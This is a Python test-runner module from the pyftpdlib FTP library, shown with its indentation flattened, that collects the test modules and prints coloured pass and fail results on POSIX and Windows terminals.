from unittest import TextTestRunner
try:
import ctypes
except ImportError:
ctypes = None
from pyftpdlib.test import configure_logging
from pyftpdlib.test import remove_test_files
from pyftpdlib.test import unittest
from pyftpdlib.test import VERBOSITY
HERE = os.path.abspath(os.path.dirname(__file__))
if os.name == 'posix':
GREEN = 1
RED = 2
BROWN = 94
else:
GREEN = 2
RED = 4
BROWN = 6
DEFAULT_COLOR = 7
def term_supports_colors(file=sys.stdout):
if os.name == 'nt':
return ctypes is not None
try:
import curses
assert file.isatty()
curses.setupterm()
assert curses.tigetnum("colors") > 0
except Exception:
return False
else:
return True
def hilite(s, color, bold=False):
"""Return an highlighted version of 'string'."""
attr = []
if color == GREEN:
attr.append('32')
elif color == RED:
attr.append('91')
elif color == BROWN:
attr.append('33')
else:
raise ValueError("unrecognized color")
if bold:
attr.append('1')
return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), s)
def _stderr_handle():
GetStdHandle = ctypes.windll.Kernel32.GetStdHandle
STD_ERROR_HANDLE_ID = ctypes.c_ulong(0xfffffff4)
GetStdHandle.restype = ctypes.c_ulong
handle = GetStdHandle(STD_ERROR_HANDLE_ID)
atexit.register(ctypes.windll.Kernel32.CloseHandle, handle)
return handle
def win_colorprint(printer, s, color, bold=False):
if bold and color <= 7:
color += 8
handle = _stderr_handle()
SetConsoleTextAttribute = ctypes.windll.Kernel32.SetConsoleTextAttribute
SetConsoleTextAttribute(handle, color)
try:
printer(s)
finally:
SetConsoleTextAttribute(handle, DEFAULT_COLOR)
class ColouredResult(TextTestResult):
def _color_print(self, s, color, bold=False):
if os.name == 'posix':
self.stream.writeln(hilite(s, color, bold=bold))
else:
win_colorprint(self.stream.writeln, s, color, bold=bold)
def addSuccess(self, test):
TestResult.addSuccess(self, test)
self._color_print("OK", GREEN)
def addError(self, test, err):
TestResult.addError(self, test, err)
self._color_print("ERROR", RED, bold=True)
def addFailure(self, test, err):
TestResult.addFailure(self, test, err)
self._color_print("FAIL", RED)
def addSkip(self, test, reason):
TestResult.addSkip(self, test, reason)
self._color_print("skipped: %s" % reason, BROWN)
def printErrorList(self, flavour, errors):
flavour = hilite(flavour, RED, bold=flavour == 'ERROR')
TextTestResult.printErrorList(self, flavour, errors)
class ColouredRunner(TextTestRunner):
resultclass = ColouredResult if term_supports_colors() else TextTestResult
def _makeResult(self):
# Store result instance so that it can be accessed on
# KeyboardInterrupt.
self.result = TextTestRunner._makeResult(self)
return self.result
def get_suite(name=None):
suite = unittest.TestSuite()
if name is None:
testmods = [os.path.splitext(x)[0] for x in os.listdir(HERE)
if x.endswith('.py') and x.startswith('test_')]
for tm in testmods:
# ...so that the full test paths are printed on screen
tm = "pyftpdlib.test.%s" % tm
suite.addTest(unittest.defaultTestLoader.loadTestsFromName(tm))
else:
name = os.path.splitext(os.path.basename(name))[0]
suite.addTest(unittest.defaultTestLoader.loadTestsFromName(name))
return suite
def main(name=None):
configure_logging()
remove_test_files()
runner = ColouredRunner(verbosity=VERBOSITY)
try:
result = runner.run(get_suite(name))
except (KeyboardInterrupt, SystemExit) as err:
print("received %s" % err.__class__.__name__, file=sys.stderr)
runner.result.printErrors()
sys.exit(1)
else:
success = result.wasSuccessful()
sys.exit(0 if success else 1)
if __name__ == '__main__':
main()
| 28.08805 | 78 | 0.661666 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.